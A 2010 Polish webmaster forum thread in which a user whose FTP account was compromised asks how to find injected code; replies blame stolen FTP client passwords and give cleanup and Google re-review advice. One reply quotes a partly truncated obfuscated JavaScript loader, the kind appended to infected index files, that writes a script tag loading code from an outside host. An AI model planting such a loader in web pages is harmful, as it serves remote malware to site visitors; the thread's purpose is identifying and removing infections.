Strona jako dokonująca ataków! + Prośba o Pomoc., HELP :( Opcje

[kamykthm]

Witam, dostał mi się jakiś robal na ftp'a i dostaje po oczach taki komunikat:

Strona zgłoszona jako dokonująca ataków!

Strona wwww.artrent.in została zgłoszona jako strona stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa.

Wywołuje w/w strone z chwilą gdy na domenie nie ma głównego pliku index.* lub katalogu (każdy wie o co chodzi)

Przyznam szczerze że w pewnym okresie czasu dużo osób miało dostęp do ftp'a, ale nie do całego tylko do określonych katalogów, z tym że tam nic nie znalazłem. Szukałem również w innych plikach złośliwego kodu, ale bez skutku. Stąd moje pytanie czy ktoś ma jakiś pomysł aby to g...o usunąć. Mam na ftp'ie ponad 15GB danych, php + html + js etc. Przeskanowanie tego wszystkiego plik po pliku (a tak doradzili mi w home, bo mam tak hosting + podeślą logi i kazali zaktualizować cmy) zajmie mi chyba z rok ;/

I moje drugie pytanie, czy istnieje narzędzie/program aby przeskanował określone pliki php/html i wyszukał określoną skłądnie/kod ?

Proszę o HELP.

[Fifi209]

I moje drugie pytanie, czy istnieje narzędzie/program aby przeskanował określone pliki php/html i wyszukał określoną skłądnie/kod ?

Proszę o HELP.

Możesz sam napisać opierając się na wyrażeniach regularnych. ;]

[Wiktor P.]

To jest bardzo częsty problem.
Właściwie to masz gratis takie problemy jak pracujesz na windows.
W 99% podobnych przypadków dane do konta FTP zostały pobrane przez jakiś wstrętny program
z klienta FTP.
Bardzo dziurawy był kiedyś TotalCommander i zaleca się jego aktualizację do ostatniej najnowszej wersji,
bo twórcom tego programu przez 10 lat nie chciało się załatać dziury.
Dziurawa też jest FileZilla i masa innych podobnych darmówek.

Podejrzewam, że masz doklejony kod na końcu plików index.php, albo w plikach JavaScript.
Jedyne wyjście to skasować wszystko z ftp i wgrać spowrotem (kopia z np. przed kilku dni, kiedy problemu nie było, jeśli prowadzisz archiwizację) lub posprawdzać po kolei wszystkie pliki.
Kod jest doklejany prawie zawsze na samym dole wspomnianych przeze mnie plików.

Po wykonaniu tych czynności piszesz do wujka Google, że prosisz o ponowne sprawdzenie strony, gdyż ktoś wykradł dane do ftp,
podpiął coś itp.

Ponadto:
1. Skanujesz kompa antywirem.
2. Zmieniasz regularnie hasła do ftp.
3. Unikasz zapisywania haseł w pamięci klienta FTP.
4. Usuwasz windowsa, wgrywasz pingwina i problem nigdy nie wróci.

Nie znam żadnych programów do skanu w takim przypadku, ale jest pewien sposób.
Jest pewien program, nazywa się HTML Search And Replace.
Można doklejony kod zlikwidować tym programem hurtowo na wszystkich plikach o ile
w każdym pliku doklejono to samo i jeśli znajdziesz ten kod, żeby go podać programowi HTML Search And Replace.
Jak wspomniałem najczęściej jest on doklejany w plikach index.php lub javascript na samym dole.

Ten post edytował Wiktor P. 14.06.2010, 17:34:00

[kamykthm]

Co do haseł to już pozmieniałem wszystkie, co do microshita niestety ale musze na nim pozostac (jetem grafikiem) ewentualnie mac ale na maca nie mam $. Kopia nic nie daje bo mam najstarsza z przed 3 dni. Co do TC i FZ to teraz juz nie bede zapisywał haseł. Możecie podać przykładowy dopisywany kod ?

P.S: dzięki za szybką odpowiedź !

[Wiktor P.]

Możecie podać przykładowy dopisywany kod ?

[HTML] pobierz, plaintext 
<script> 
try
{window.onload=function()
{
document.write('<div id=megaid>opera-com.mercadolibre.co</div>');Z2actjidmypp = document.getElementById('megaid').innerHTML + 'm@!.(m#)&x&@.!)&v&&k$&^)o)n^@!t!& 
 
(...)
 
m#@^/!)'.replace(/#|\(|\$|\)|\^|\!|@|
&/ig, '') ;document.write('<scr'+'ipt src=http://'+Z2actjidmypp.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');
} 
}  catch(Lozwklx ) {}
</script>
 
<!--2587ada5e557ba7c3bd1e13bcc3aa4c8-->
[HTML] pobierz, plaintext 

A jeśli chodzi o zgłoszenie prośby do Google o ponowne sprawdzenie strony, to linka nie podam gdzie to się robi, bo nie pamiętam.
Ale w moim przypadku czekałem na interwencję około 48h więc bardzo krótko.

W kwestii Linuksa, jako grafik możesz mieć drugi system i na nim używać klienta ftp.
Polecam Ubuntu Studio. To jest dystrybucja właśnie dla grafików.

Ten post edytował Wiktor P. 14.06.2010, 17:55:37

[kamykthm]

Możesz sam napisać opierając się na wyrażeniach regularnych. ;]

Nie jestem programistą, jeśli masz jakiś gotowy skrypt to na prawdę bym był wdzięczny jeśli byś podesłał.

Dzięki za przykład.

A jeśli chodzi o zgłoszenie prośby do Google o ponowne sprawdzenie strony, to linka nie podam gdzie to się robi, bo nie pamiętam.
Ale w moim przypadku czekałem na interwencję około 48h więc bardzo krótko.

To mi chwilowo nie przeszkadza bo na tej domenie akurat nic nie ma i chyba nigdy nie bedzie. Co nie zmienia faktu ze zgłosze to do Pana G.

W kwestii Linuksa, jako grafik możesz mieć drugi system i na nim używać klienta ftp.
Polecam Ubuntu Studio. To jest dystrybucja właśnie dla grafików.

hmmm odpalać pingwina tylko pod FTP ? mało optymalne rozwiązanie. Zastowie się mocno na 'Jabłuszkiem' chodź ciężko będzie bo już próbowałem pod moją konfigurację.

Ten post edytował kamykthm 14.06.2010, 18:11:33

[konfeusz]

... sie wtrace... tak jak napisal Wiktor, w 99% przypadkach jest doklejony na samym koncu kod do pliku index.php lub index.html (raz mi sie zdazylo, ze musialem odpluskwic plik z danymi do polaczenia z mysql'em i byl zakodowany w md5 wiec sie nameczylem) jednak zawsze (w moim przypadku) nalezalo wyszukac na koncu plikow znacznik <script> w przypadku plikow php znacznik byl wypisywany przez deklaracje echo '';. Wykasowanie tego zawsze czyscilo plik z syfu.

Co do Total Commandera i innych klientow, jesli ktos musi pracowac na windzie (tak jak ja, chociaz pracuje tez na pinglu, ale programuje w AS wiec niejako musze odpalac okienka) nie ma wiekszej rady, jednak bez wzglednie nie nalezy zapamietywac w tych klientach hasel.

Jesli chodzi o link do ponownego sprawdzenia witryny w googlach, odsylam na Forum dla Webdeweloperow na google
http://www.google.com/support/forum/p/Webmasters?hl=pl